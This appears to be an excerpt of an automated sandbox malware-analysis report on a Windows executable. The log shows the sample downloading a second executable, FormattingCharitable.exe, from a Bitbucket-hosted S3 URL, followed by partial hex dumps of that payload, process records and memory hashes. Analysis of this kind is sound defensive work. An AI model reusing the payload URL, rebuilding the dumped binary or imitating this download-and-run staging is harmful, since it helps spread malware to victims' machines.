                                                                                                                                                          X-Render-Time: 0.04756498336791992
                                                                                                                                                          X-B3-Traceid: 32a02be8440e4ca794e59f614b7179f2
                                                                                                                                                          X-B3-Spanid: 33b0f6d2beb25d86
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          Content-Security-Policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net h [TRUNCATED]
                                                                                                                                                          X-Usage-Quota-Remaining: 999140.860
                                                                                                                                                          X-Usage-Request-Cost: 873.17
                                                                                                                                                          X-Usage-User-Time: 0.021696
                                                                                                                                                          X-Usage-System-Time: 0.004499
                                                                                                                                                          X-Usage-Input-Ops: 0
                                                                                                                                                          X-Usage-Output-Ops: 0
                                                                                                                                                          Age: 0
                                                                                                                                                          X-Cache: MISS
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          X-Xss-Protection: 1; mode=block
                                                                                                                                                          Atl-Traceid: 32a02be8440e4ca794e59f614b7179f2
                                                                                                                                                          Atl-Request-Id: 32a02be8-440e-4ca7-94e5-9f614b7179f2
                                                                                                                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                          Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                          Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                          Server-Timing: atl-edge;dur=161,atl-edge-internal;dur=10,atl-edge-upstream;dur=159,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                                          Connection: close


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          9192.168.2.6497763.5.29.904434140C:\Users\user\Desktop\BJQizQ6sqT.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-23 08:17:07 UTC1342OUTGET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHZYI6IXY&Signature=J4b5F46nqJdxKu%2F94UHON1kWKIg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJHMEUCIEz4aJUGTT3%2F3aj0Sn7nYMfMQonpUyZRFJuL3VakDRucAiEAnHq8hEynshgipHPMX9ETdpZ7Hf7Do5GY23eCDhjjhnUqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDGwYdeefJ7qByxmhkCqEAqZU4UyGCH%2FIwXiBlHEfohy46PnGMfQ7E1PpYAz39S7FGTmhuKzqUff78ACf4GMbiYrBmT9RuUzkS6Gch8a8ELqELgAlkACrGlVQkUjMXlvV7tIEl9F8MrCQmEKAO3ZsuSp2OMS4u3XjM%2F%2FA%2Bm63uHeTE9TKYVc7oOdwav0mPwPXZEbECPwmrRfW%2FUxIHsvqiThPt%2F6Q4jqXHsqNzMwceDkXQHD0olNOLky3nAT%2BFCZYYRBYz8nsw9Z4W16CkLSZ2lFSLBPzD39jNyr6Luh%2Bbp2Im7TrxPYqVsuHTCv01wWV4InZ8Pmq6K1xnmPH%2FwhNJxLwji3W7h4wrFfB5Y%2FJPqqV3ryhMP61pLsGOp0B7rs44luHq97cxYmDLldQ21jEQyqEzNgQtLPiU7epXvR9H58p%2FhwRyUGLWDfqJtktXvdi4w2%2FLn0QPHILI%2F%2BgVTSv8F0qx4eoZGi5u1hVCaPz1DmiOUPdtDgGt [TRUNCATED]
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                          2024-12-23 08:17:07 UTC574INHTTP/1.1 200 OK
                                                                                                                                                          x-amz-id-2: 3Lh+M8pISWlIYTlYKH3QMdGkqDvAWUVwWpwnvMypB+h0cANCfFDoxN7Yrm2AbcNV2IXuitPNG8h47J1JS5vY9ZKbxebG/QjF
                                                                                                                                                          x-amz-request-id: 0DGNA84MA3Z6XE33
                                                                                                                                                          Date: Mon, 23 Dec 2024 08:17:08 GMT
                                                                                                                                                          Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
                                                                                                                                                          ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                          x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
                                                                                                                                                          Content-Disposition: attachment; filename="FormattingCharitable.exe"
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Content-Type: application/x-msdownload
                                                                                                                                                          Content-Length: 1325507
                                                                                                                                                          Server: AmazonS3
                                                                                                                                                          Connection: close
                                                                                                                                                          2024-12-23 08:17:07 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 f0 0b 00 00 42 00 00 af 38 00 00 00 10 00
                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8
                                                                                                                                                          2024-12-23 08:17:07 UTC450INData Raw: 00 ff 75 f8 e8 bb f1 ff ff e9 7b 03 00 00 ff 75 fc e8 ae f1 ff ff 33 db 81 7d 0c 05 04 00 00 75 11 89 5d 10 c7 45 14 01 00 00 00 c7 45 0c 0f 04 00 00 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 dc 00 00 00 8b 7d 14 39 45 0c 74 0d 81 7f 04 08 04 00 00 0f 85 c7 00 00 00 f7 05 08 eb 47 00 00 02 00 00 75 79 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 6b 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 f4 fb ff ff 3b c3 7c 56 8b 55 e8 8b c8 69 c9 20 40 00 00 8d 54 11 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 c2 c4 ff ff a1 08 eb 47 00 33 c9 c1 e8 08 41 f7 d0 23 c1 89 4d 10 89 45 14 c7 45 0c 0f 04 00 00 3b fb 74 3e 81 7f 08 3d fe ff ff 75 0e ff 77 5c 53 68 19 04 00 00 ff 75 fc ff d6 81 7f 08 39
                                                                                                                                                          Data Ascii: u{u3}u]EE}Nt9E}9EtGuy9EtMyuk39EQu;|VUi @Tu@@tyPG3A#MEE;t>=uw\Shu9
                                                                                                                                                          2024-12-23 08:17:07 UTC16384INData Raw: 00 3b c3 74 07 50 ff 15 2c 90 40 00 a1 6c 1d 44 00 3b c3 74 07 50 ff 15 30 91 40 00 89 1d 68 1d 44 00 89 1d 6c 1d 44 00 89 1d 10 eb 47 00 81 7d 0c 0f 04 00 00 0f 85 4b 01 00 00 53 53 e8 f4 c3 ff ff 39 5d 10 74 07 6a 08 e8 0d c6 ff ff 39 5d 14 74 3f ff 35 6c 1d 44 00 e8 d1 c4 ff ff 8b f8 57 e8 7e c4 ff ff 33 c0 33 c9 3b fb 7e 0e 8b 55 e4 39 1c 82 74 01 41 40 3b c7 7c f2 53 51 68 4e 01 00 00 ff 75 f8 ff d6 89 7d 14 c7 45 0c 20 04 00 00 53 53 e8 9d c3 ff ff a1 6c 1d 44 00 89 45 e0 a1 c8 ea 47 00 c7 45 c4 30 f0 00 00 89 5d e8 39 1d cc ea 47 00 0f 8e a1 00 00 00 8d 78 08 8b 45 e0 8b 4d e8 8b 04 88 3b c3 74 79 8b 0f 89 45 bc c7 45 b8 08 00 00 00 f7 c1 00 01 00 00 74 13 8d 47 10 c7 45 b8 09 00 00 00 89 45 c8 81 27 ff fe ff ff f6 c1 40 74 05 6a 03 58 eb 0e 8b c1
                                                                                                                                                          Data Ascii: ;tP,@lD;tP0@hDlDG}KSS9]tj9]t?5lDW~33;~U9tA@;|SQhNu}E SSlDEGE0]9GxEM;tyEEtGEE'@tjX
                                                                                                                                                          2024-12-23 08:17:07 UTC1024INData Raw: 69 00 6e 00 64 00 6f 00 77 00 00 00 00 00 50 00 6f 00 70 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 65 00 6d 00 70 00 74 00 79 00 00 00 00 00 45 00 78 00 63 00 68 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 3c 00 20 00 25 00 64 00 20 00 65 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 73 00 00 00 52 00 4d 00 44 00 69 00 72 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 42 00 6f 00 78 00 3a 00 20 00 25 00 64 00 2c 00 22 00 25 00 73 00 22 00 00 00 44 00 65 00 6c 00 65 00 74 00 65 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 25 00 73 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 77 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 74 00 6f 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 46 00 69 00 6c
                                                                                                                                                          Data Ascii: indowPop: stack emptyExch: stack < %d elementsRMDir: "%s"MessageBox: %d,"%s"Delete: "%s"%sFile: wrote %d to "%s"Fil
                                                                                                                                                          2024-12-23 08:17:07 UTC16384INData Raw: 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 2d 00 20 00 61 00 20 00 66 00 69 00 6c 00 65 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 65 00 78 00 69 00 73 00 74 00 73 00 00 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 65 00 72 00 72 00 3d 00 25 00 64 00 29 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 25 00 64 00 29 00 00 00 00 00 53
                                                                                                                                                          Data Ascii: eDirectory: can't create "%s" - a file already existsCreateDirectory: can't create "%s" (err=%d)CreateDirectory: "%s" (%d)S
                                                                                                                                                          2024-12-23 08:17:07 UTC1024INData Raw: e8 c7 e6 52 b1 3a d6 d7 02 ab 3a 7c 39 58 c5 d6 e5 20 f1 ec 08 ce 07 cd e8 df bf 7f 82 30 a8 57 9f 88 81 3d 7b 87 3d 3d 76 58 69 b7 f9 13 7f db ed 8d 09 ff d1 73 ec 8b 65 98 86 79 fa f2 e6 7a 40 df be 7d 13 00 c6 9f 7d d6 c6 c5 d3 9f bd 88 67 9e 79 a6 55 d8 60 c7 f7 ec d9 33 01 60 5c 47 a6 5b cd 7f e2 89 27 e2 d9 70 26 00 8c b7 95 47 1f 7d f4 b2 e0 c6 c1 45 74 eb f6 70 d4 93 0f 3e 19 33 fc 91 21 b5 53 9e 9a f0 a7 89 3d c7 fd f9 b9 47 fb d5 3d d8 fd c1 98 ae dd ba 46 61 19 36 81 6d 82 8d 5a 6b 24 e8 b0 e9 32 89 07 dc 28 8c e3 f9 71 fc 19 ab c3 26 31 9a 3f 0f f1 32 5e 6c 78 b6 b7 6f df 7e f9 cf 7e f6 b3 79 d0 16 d6 18 9c 2a c0 a9 01 31 01 72 f1 e5 c3 8c 98 00 68 15 34 0b da 65 75 2a 00 5a f7 c3 30 00 fd 37 1c 19 f4 dc ba 7a df 7e 6b ea f7 0d 5c 53 89 1d be
                                                                                                                                                          Data Ascii: R::|9X 0W={==vXiseyz@}}gyU`3`\G['p&G}Etp>3!S=G=Fa6mZk$2(q&1?2^lxo~~y*1rh4eu*Z07z~k\S
                                                                                                                                                          2024-12-23 08:17:07 UTC1749INData Raw: d4 c8 e6 cd 9b 1b d9 b2 65 8b 42 be 6f dd ba 55 21 d3 b7 6d db d6 0c 99 2f df b7 6f df ae d0 97 b9 12 64 7d e6 7a e5 7f e5 bf f5 ef 3a b2 dd 82 be af 40 ca 40 ca 05 65 85 f2 43 59 a2 7c d9 20 71 99 2f 27 36 0c c4 86 41 21 e3 6c b2 88 cd 83 e2 bd f7 de 53 98 df 4d d8 64 34 03 c7 d9 0a 36 21 cd 90 7a e1 08 a9 3f 26 66 3d 33 eb a3 59 6f cd 7a 2e 48 1c 98 71 62 62 c6 99 19 87 82 19 af 12 c7 12 df 8a 99 1c f3 af 4c a7 59 d3 67 d0 ac 19 b6 7c f0 ca f4 57 88 8d 0b 21 af e8 4c 9e 3c b9 19 6c 4e 2c 61 93 d2 08 1b 15 e2 1c a5 c6 f1 1b 36 40 6d 5e 9f be 1e 80 f5 58 c1 c6 a6 19 dc 08 52 b0 d9 69 06 e7 4b 4b d8 cc 28 d8 bc 34 83 cd 8b 82 4d 8b 25 6c 62 14 c3 86 0d a3 a1 c3 87 d2 d0 61 43 69 cc 8b a3 69 da f3 93 68 76 5f 2e d3 9e 36 03 30 72 c0 70 1a f2 e2 10 7a e1 c5
                                                                                                                                                          Data Ascii: eBoU!m/od}z:@@eCY| q/'6A!lSMd46!z?&f=3Yoz.HqbbLYg|W!L<lN,a6@m^XRiKK(4M%lbaCiihv_.60rpz
                                                                                                                                                          2024-12-23 08:17:07 UTC16384INData Raw: d0 9b cc 4a 88 37 9b 81 b5 cb 97 d9 92 b5 3d 81 9b 49 5f 84 41 04 45 04 48 10 01 14 4c 23 e0 c8 10 08 ba 19 d0 d1 c5 f9 4a b0 5a b7 15 b2 3d cd b7 db de 5d bf 89 5b fc 9b 9d 68 db 96 0d b4 67 e3 db b4 67 c3 02 da ba 7e 19 ad 5b bf 81 d6 ae 6b de 7a 17 74 31 c5 38 ca 04 42 bf 73 e7 ce 46 03 00 f0 5d 4e 49 c0 b0 60 5b d4 7f da cd 85 ac 5b d6 27 c7 c3 c4 3c 5e e6 74 a0 7a 7b 98 b5 7c bc 37 b1 b8 82 75 38 ee f6 e9 6a 19 7b 3d 50 62 6e 67 2d 0b f5 86 95 dc fa df b0 91 de 75 da a3 58 c5 fb be 01 46 80 d7 21 3d 04 8a ab 24 f0 82 59 9f 05 5d e0 ad d0 7b 0b 00 7a 01 10 37 88 65 3d 77 58 09 bb 88 bb 15 66 f7 34 7e 8b 75 8a 01 b0 12 79 9d d6 84 5e 30 85 5e 84 5b 04 be 35 a1 37 05 5e be 9b c8 f2 92 4f 80 be 1d d8 46 d9 ee c6 cf 77 f9 f3 5d db 27 10 73 23 06 48 7a 61
                                                                                                                                                          Data Ascii: J7=I_AEHL#JZ=][hgg~[kzt18BsF]NI`[['<^tz{|7u8j{=Pbng-uXF!=$Y]{z7e=wXf4~uy^0^[57^OFw]'s#Hza
                                                                                                                                                          2024-12-23 08:17:07 UTC1024INData Raw: 1a 27 ce 34 4e 62 c1 bb bd 69 f3 73 33 69 41 bb a7 99 27 79 7c 06 85 ec d9 47 19 9c dc b2 0a 72 1a 0d 00 b0 32 01 6d 31 02 97 6a 00 04 11 04 5d 2c 74 1a 05 df 84 0d 40 45 75 21 95 55 16 52 54 50 05 ad 9d de 40 d3 1e 3a 43 53 99 b5 af 34 50 64 20 8b 5e 55 11 55 d6 5e 6c 00 20 f0 e5 dc 62 ce 88 4f a1 e0 1d 9e b4 f7 8d 55 e4 f2 fa 0a 0a dc e2 aa ee 2d 2e 87 01 a8 fe ee 0d 00 c4 1f 5d fc 19 55 d5 14 7c f2 0c b7 fc 3f 51 e2 7f f0 e4 69 4a ab ac a2 52 2e 8f b2 ef 91 01 90 63 84 f5 e3 a9 67 00 e3 22 f0 fa b1 95 71 39 ee 66 bd 68 34 00 5c 77 f2 58 a0 73 73 b2 29 31 23 9f 0e 25 17 53 44 6a 31 65 e7 e4 52 79 41 16 15 e4 36 d5 41 bc 16 16 ef b1 28 28 2c a2 fc 82 42 ca e5 f5 a0 4e ca 79 7b a9 d3 40 89 b5 32 01 5c c7 f3 b8 3e e7 f2 b8 6f 08 25 4c df 44 99 5d 27 53 f5
                                                                                                                                                          Data Ascii: '4Nbis3iA'y|Gr2m1j],t@Eu!URTP@:CS4Pd ^UU^l bOU-.]U|?QiJR.cg"q9fh4\wXss)1#%SDj1eRyA6A((,BNy{@2\>o%LD]'S
                                                                                                                                                          2024-12-23 08:17:07 UTC16384INData Raw: 8e 25 5a ee e8 d2 c7 6d e2 6e 1e ee e4 e6 ee a6 04 7f d3 d2 f5 b4 fa 8d a5 b4 7a de 52 da b4 64 1d ed dc e6 44 7b 5d f7 aa 65 f0 54 59 08 3e ea 08 62 05 f5 1b 26 e2 bd f7 de a3 d1 a3 47 b7 66 00 76 b2 9a e3 41 40 78 11 d0 33 cc 93 37 74 bf fd 95 1b fb 76 0e bf 71 d0 3d 5f de fc c2 fd 74 f3 90 fb e9 c6 e7 ef fb ec 86 41 f7 06 dc 32 a8 43 7f 5e 46 06 11 ff 2b 32 00 d5 a1 83 07 d5 84 0d f6 ad 3c 3c d0 df 3e e9 bb 19 de 3a d7 d0 7e ee 67 c7 07 bd f6 eb 0f 77 be f6 cd f9 af 97 13 d1 32 66 ce 85 33 a7 66 7d 7c 0a 85 a2 0f 57 dd 00 20 51 a0 15 83 eb 00 70 ee 06 c9 03 15 01 dd 39 a0 c9 08 84 52 78 84 8d b0 f0 96 bb f3 04 d3 10 98 06 40 2a 9d 59 a1 25 58 24 a0 04 3d 78 81 24 80 46 03 c0 e0 71 99 78 2e 76 d8 be 03 e4 f6 da 2a 65 02 36 f5 9b 4e ee 3c 1e e1 13 44 69
                                                                                                                                                          Data Ascii: %ZmnzRdD{]eTY>b&GfvA@x37tvq=_tA2C^F+2<<>:~gw2f3f}|W Qp9Rx@*Y%X$=x$Fqx.v*e6N<Di


                                                                                                                                                          Click to jump to process

                                                                                                                                                          Click to jump to process

                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                          Click to jump to process

                                                                                                                                                          Target ID:0
                                                                                                                                                          Start time:03:16:36
                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                          Path:C:\Users\user\Desktop\BJQizQ6sqT.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Users\user\Desktop\BJQizQ6sqT.exe"
                                                                                                                                                          Imagebase:0xa30000
                                                                                                                                                          File size:2'916'352 bytes
                                                                                                                                                          MD5 hash:DAED40D82D8D43F2AD0BE3FB944C99A3
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:12
                                                                                                                                                          Start time:03:17:10
                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 1988
                                                                                                                                                          Imagebase:0x3d0000
                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Reset < >
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000003.2368644392.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FE8000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_3_fe8000_BJQizQ6sqT.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: Inte
                                                                                                                                                            • API String ID: 0-4086957988
                                                                                                                                                            • Opcode ID: 84d26b0c12f5b3b81951b6d0eb7f902a7353da7e124d0783429ffb958ca6b73a
                                                                                                                                                            • Instruction ID: 57b17db556b3053b36777cfa4e3e3ad182d4dc91251336a8067323c61ec4e0fa
                                                                                                                                                            • Opcode Fuzzy Hash: 84d26b0c12f5b3b81951b6d0eb7f902a7353da7e124d0783429ffb958ca6b73a
                                                                                                                                                            • Instruction Fuzzy Hash: 8FA2A69244E3C25FC71387745C79AA17FB0AE13118B0E46DBC4D9CF4A3E289591AE7A3
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000003.2368644392.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FE8000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_3_fe8000_BJQizQ6sqT.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7bbe7bb8b855937e1c7fbff0673d22480f1ba681d3382fcc71b8bec1c8c76c76
                                                                                                                                                            • Instruction ID: d54f6d8c05f57560f5ac0ed4ab4f576f42c3400a25073db7b61faacd04df5439
                                                                                                                                                            • Opcode Fuzzy Hash: 7bbe7bb8b855937e1c7fbff0673d22480f1ba681d3382fcc71b8bec1c8c76c76
                                                                                                                                                            • Instruction Fuzzy Hash: 2C81CE6244E3D05FC71387306D386A1BF706B67214B0E85EFD4C68F4A3D21A5A0AE763